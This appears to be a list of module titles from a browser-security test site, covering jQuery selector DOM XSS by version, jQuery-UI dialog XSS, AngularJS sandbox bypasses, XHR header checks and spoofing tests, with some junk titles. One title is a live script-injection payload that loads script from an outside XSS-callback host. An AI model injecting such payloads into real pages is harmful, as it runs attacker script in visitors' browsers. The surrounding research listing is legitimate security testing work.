Modules

jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') Hooking Storage Objects Number Properties exposed by the Window Object? jQuery Versions Vulnerable to Selector DOM XSS via # aka Selector IDs. Can Do Not Track be bypassed using XHR ? Properties of LocalStorage TestHarness: XMLHttpRequest: setRequestHeader() name argument checks List of constructors that refer to window w/o parenthesis Direct references to Window objects Element Node Setters Location unforgeable - Test Harness Knockout JS libraries vulnerable to data-bind injection jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') Test XSS for jQuery jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') testing no-op jQuery-UI XSS via .dialog() method's "title" argument [CVE-2010-5312] jQuery Migrate DOM XSS $(".<XSS>") [Class selector] jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') XSS vectors without user interaction Attribute Separators extended test for jquery selector xss Can Cookie Setter be Hooked? Geolocation Spoof Jquery ID selector + location.hash.slice(1) Jquery attribute equals selector + location.hash.slice(1) https://passport.informatica.com/js/jquery.js Does Iframe sandbox execute script inside child iframe? chuang yu dun Test List of all jQuery versions vulnerable to the Selector DOM XSS. (http://ma.la/jquery_xss/) 123 123 "><script src=https://xs90.xss.ht></script> test test test final jQuery Migrate DOM XSS $(".<XSS>") [Class selector] (new) SecurityPolicyViolationEvent jQuery Versions Vulnerable to Selector DOM XSS via # aka Selector IDs. (2) Allowed Request Headers by XHR Can Navigator.UserAgent Be Spoofed? Check document.domain Location hash (aka. fragment) spills into data URI content Configurability of Location Properties HTTP Methods Supported by XHR TestHarness: Using Assertions in DomStorm List of properties that doesn't need parenthesis TestHarness: Allowed Request Headers by XHR Document Setters jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') Getters & Setters for Element.prototype jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') jQuery Selectors Vulnerable to XSS jQuery Versions Vulnerable to Selector XSS with class Attribute ('. XSS_VECTOR') jQuery-UI XSS via .dialog() method jQuery-UI XSS via .dialog() method's "closeText" argument jQuery Migrate DOM XSS $("#<XSS>") [id selector] jQuery Migrate DOM XSS $("a[href='<XSS>']") [Attribute equals selector] Check document.domain jQuery UI .dialog() closeText property DOM XSS Sink. AngularJS Sandbox Bypasses s Geolocation Overriding Jquery ID selector + location.hash Jquery class selector + hash.slice(1) jquery 1.8.1 https://passport.informatica.com/js/jquery.js Testing jQuery 3.1 jQuery-UI XSS via .dialog() method's "closeText" argument (short version) chuang yu dun jQuery Versions Vulnerable to Selector DOM XSS via # aka Selector IDs. 2132 123 Updated jquery XSS attack Jquery a[] xss test test angry jquery sdf Global event handlers Valid attribute separators proxy cookie Run domato fuzzer 1000000 times JQuery XSS test